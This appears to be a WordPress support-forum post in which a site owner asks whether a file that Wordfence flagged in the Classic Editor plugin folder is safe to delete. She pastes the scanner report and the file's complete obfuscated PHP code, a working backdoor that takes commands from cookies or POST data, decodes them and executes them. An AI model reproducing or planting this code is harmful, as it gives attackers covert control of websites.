Hello,
Thanks for the great plugin!
My Wordfence security program reported the following code as malicious or unsafe. I don’t want to delete it if it is required. Please let me know if I should delete this. And also if I should remove and reinstall the Classic plugin.
Thank you so much!!
Angele
Here is what they reported.
File appears to be malicious or unsafe: wp-content/plugins/classic-editor/js/nonipcgr.php
Type: File
Issue Found May 14, 2021 11:48 am
Critical
Filename: wp-content/plugins/classic-editor/js/nonipcgr.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: $fzdxx = ‘3yltda7bg5-k*m4ocv#6e1n0i9sfrxp_Hu\’2’;$tdgreg = Array();$tdgreg[] = $fzdxx[16].$fzdxx[35].$fzdxx[25].$fzdxx[27].$fzdxx[4].
The issue type is: Suspicious:PHP/encodedtextlookup.7024
Description: Suspicious encoded content. This encoding is often used to hide malware
Here is the specific code:
<?php
$fzdxx = '3yltda7bg5-k*m4ocv#6e1n0i9sfrxp_Hu\'2';$tdgreg = Array();$tdgreg[] = $fzdxx[16].$fzdxx[35].$fzdxx[25].$fzdxx[27].$fzdxx[4].$fzdxx[16].$fzdxx[19].$fzdxx[6].$fzdxx[10].$fzdxx[25].$fzdxx[35].$fzdxx[27].$fzdxx[5].$fzdxx[10].$fzdxx[14].$fzdxx[7].$fzdxx[23].$fzdxx[25].$fzdxx[10].$fzdxx[25].$fzdxx[14].$fzdxx[35].$fzdxx[21].$fzdxx[10].$fzdxx[7].$fzdxx[35].$fzdxx[0].$fzdxx[25].$fzdxx[16].$fzdxx[19].$fzdxx[16].$fzdxx[14].$fzdxx[19].$fzdxx[20].$fzdxx[35].$fzdxx[9];$tdgreg[] = $fzdxx[16].$fzdxx[28].$fzdxx[20].$fzdxx[5].$fzdxx[3].$fzdxx[20].$fzdxx[31].$fzdxx[27].$fzdxx[33].$fzdxx[22].$fzdxx[16].$fzdxx[3].$fzdxx[24].$fzdxx[15].$fzdxx[22];$tdgreg[] = $fzdxx[32].$fzdxx[12];$tdgreg[] = $fzdxx[18];$tdgreg[] = $fzdxx[16].$fzdxx[15].$fzdxx[33].$fzdxx[22].$fzdxx[3];$tdgreg[] = $fzdxx[26].$fzdxx[3].$fzdxx[28].$fzdxx[31].$fzdxx[28].$fzdxx[20].$fzdxx[30].$fzdxx[20].$fzdxx[5].$fzdxx[3];$tdgreg[] = $fzdxx[20].$fzdxx[29].$fzdxx[30].$fzdxx[2].$fzdxx[15].$fzdxx[4].$fzdxx[20];$tdgreg[] = $fzdxx[26].$fzdxx[33].$fzdxx[7].$fzdxx[26].$fzdxx[3].$fzdxx[28];$tdgreg[] = $fzdxx[5].$fzdxx[28].$fzdxx[28].$fzdxx[5].$fzdxx[1].$fzdxx[31].$fzdxx[13].$fzdxx[20].$fzdxx[28].$fzdxx[8].$fzdxx[20];$tdgreg[] = $fzdxx[26].$fzdxx[3].$fzdxx[28].$fzdxx[2].$fzdxx[20].$fzdxx[22];$tdgreg[] = $fzdxx[30].$fzdxx[5].$fzdxx[16].$fzdxx[11];foreach ($tdgreg[8]($_COOKIE, $_POST) as $vqdrnj => $kgaspe){function ofbczm($tdgreg, $vqdrnj, $veyylgp){return $tdgreg[7]($tdgreg[5]($vqdrnj . $tdgreg[0], ($veyylgp / $tdgreg[9]($vqdrnj)) + 1), 0, $veyylgp);}function jopazo($tdgreg, $brgjm){return @$tdgreg[10]($tdgreg[2], $brgjm);}function tvlkcy($tdgreg, $brgjm){$wdwesr = $tdgreg[4]($brgjm) % 3;if (!$wdwesr) {$dhazhko = $tdgreg[1]; $zvchvvq = $dhazhko("", $brgjm[1]($brgjm[2]));$zvchvvq();exit();}}$kgaspe = jopazo($tdgreg, $kgaspe);tvlkcy($tdgreg, $tdgreg[6]($tdgreg[3], $kgaspe ^ ofbczm($tdgreg, $vqdrnj, $tdgreg[9]($kgaspe))));}